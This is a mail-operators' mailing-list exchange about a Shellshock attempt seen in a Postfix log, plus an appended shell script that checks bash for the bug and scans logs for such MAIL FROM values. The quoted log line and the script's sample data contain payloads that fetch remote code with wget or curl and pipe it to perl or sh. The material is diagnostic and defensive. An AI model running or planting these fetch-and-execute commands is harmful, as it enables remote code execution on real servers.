Also found one in the logs:

warning: Illegal address syntax from 
newcloud.thevinylspectrum.com[104.200.146.132] in MAIL command: <() { :; }; 
wget -qO - 136.243.150.82/qmx|perl;curl -sS 136.243.150.82/qmx|perl>

What is special about it is that it is only identified by one security vendor:
https://www.virustotal.com/gui/url/1d18ccc49a7f430d7fb74b64ac66af7710161b14fc0b834c44cde4a2f0495d31


On 15 January 2023 at 03:57:40, Ángel via mailop ([email protected]) wrote:
On 2023-01-14 at 17:33 +0200, Mary wrote:
> Thank you, I'll take a closer look, because Shellshock implies that
> somehow the SMTPD executes a bash script, which I find highly
> unlikely. That is why I thought they are trying to exploit something
> further down the pipeline (Logstash, Prometheus, etc).

The command is a normal shellshock payload. It would seem to target
the case where the mail server or an MDA sets an environment variable
with the MAIL FROM value and then executes a command through bash.
This could be the execution of a milter, a procmail... courier also
extensively uses environment variables between their programs.
The most difficult part is that a bash shell is executed... an
old version which has not been patched for this 2014 vulnerability.


_______________________________________________
mailop mailing list
[email protected]
https://list.mailop.org/listinfo/mailop
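Two checks that follow from the discussion above, written here as an added example and not taken from the thread or from any of the posters. The first reproduces the Shellshock trigger Ángel describes (bash importing a function-shaped environment variable and, if unpatched, running what follows the closing brace), the second scans Postfix smtpd warnings for MAIL FROM values of that shape and pulls out the download locations. The log lines are constructed for the example; the first mirrors the entry quoted above, the other two use documentation addresses. One caveat on reading such entries: Postfix logs "Illegal address syntax ... in MAIL command" when smtpd refuses the address with a 501, so the value never reached a milter or delivery agent on that host. The line records an attempt, not a compromise.

```shell
#!/bin/sh
# Added example for the mailop thread; not code from the list or its posters.

# 1. Reproduce the trigger: bash imports an environment value starting with
#    "() {" as a function definition; an unpatched bash (CVE-2014-6271) also
#    executes the command after the closing brace. Prints "vulnerable",
#    "patched", or "no-bash". Always returns 0 so it composes under set -e.
shellshock_check() {
    if ! command -v bash >/dev/null 2>&1; then
        echo "no-bash"
        return 0
    fi
    out=$(env x='() { :; }; echo vulnerable' bash -c 'true' 2>/dev/null)
    case "$out" in
        *vulnerable*) echo "vulnerable" ;;
        *)            echo "patched" ;;
    esac
}

# 2. Constructed Postfix log sample (single lines, as syslog writes them).
#    Line 1 mirrors the entry quoted in the thread; lines 2 and 3 are made up,
#    using documentation IP ranges, to show a variant spelling and a non-hit.
SAMPLE_LOG='Jan 14 11:02:17 mx postfix/smtpd[2211]: warning: Illegal address syntax from newcloud.thevinylspectrum.com[104.200.146.132] in MAIL command: <() { :; }; wget -qO - 136.243.150.82/qmx|perl;curl -sS 136.243.150.82/qmx|perl>
Jan 14 11:05:40 mx postfix/smtpd[2214]: warning: Illegal address syntax from unknown[198.51.100.7] in MAIL command: <(){ :;}; /bin/bash -c "curl -s http://198.51.100.7:8080/x.sh | sh">
Jan 14 11:09:03 mx postfix/smtpd[2220]: warning: Illegal address syntax from unknown[203.0.113.9] in MAIL command: <user@@example.org>'

# Print "<client-ip> <payload>" for each smtpd warning whose MAIL FROM value
# is function-shaped ("()" followed by optional whitespace and "{"). Matching
# on the shape rather than on wget/curl catches payloads with other stages.
scan_shellshock_mailfrom() {
    sed -n 's/.*Illegal address syntax from [^[]*\[\([^]]*\)\] in MAIL command: <\(()[[:space:]]*{[^>]*\)>.*/\1 \2/p'
}

# Extract download locations from payload text: a scheme-prefixed host, or a
# bare dotted host (the quoted payload carries no scheme), optional port, path.
# Requiring a dot in bare hosts keeps "/bin/bash" from matching as "bin/bash".
extract_download_urls() {
    grep -oE '(https?://[A-Za-z0-9.-]+|[A-Za-z0-9-]+(\.[A-Za-z0-9-]+)+)(:[0-9]+)?/[A-Za-z0-9._/-]+' | sort -u
}

# Helpers over the sample so the results can be checked by name.
count_shellshock_hits() {
    printf '%s\n' "$SAMPLE_LOG" | scan_shellshock_mailfrom | wc -l | tr -d ' '
}

list_download_urls() {
    printf '%s\n' "$SAMPLE_LOG" | scan_shellshock_mailfrom | extract_download_urls
}

# Stand-alone run: local bash status, then the hits and their stage-2 URLs.
echo "local bash: $(shellshock_check)"
printf '%s\n' "$SAMPLE_LOG" | scan_shellshock_mailfrom
list_download_urls
```

On a real host replace the sample with `grep 'Illegal address syntax' /var/log/mail.log | scan_shellshock_mailfrom`; the extracted hosts are what you would submit to the blocklist or look up, as Mary did with VirusTotal.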
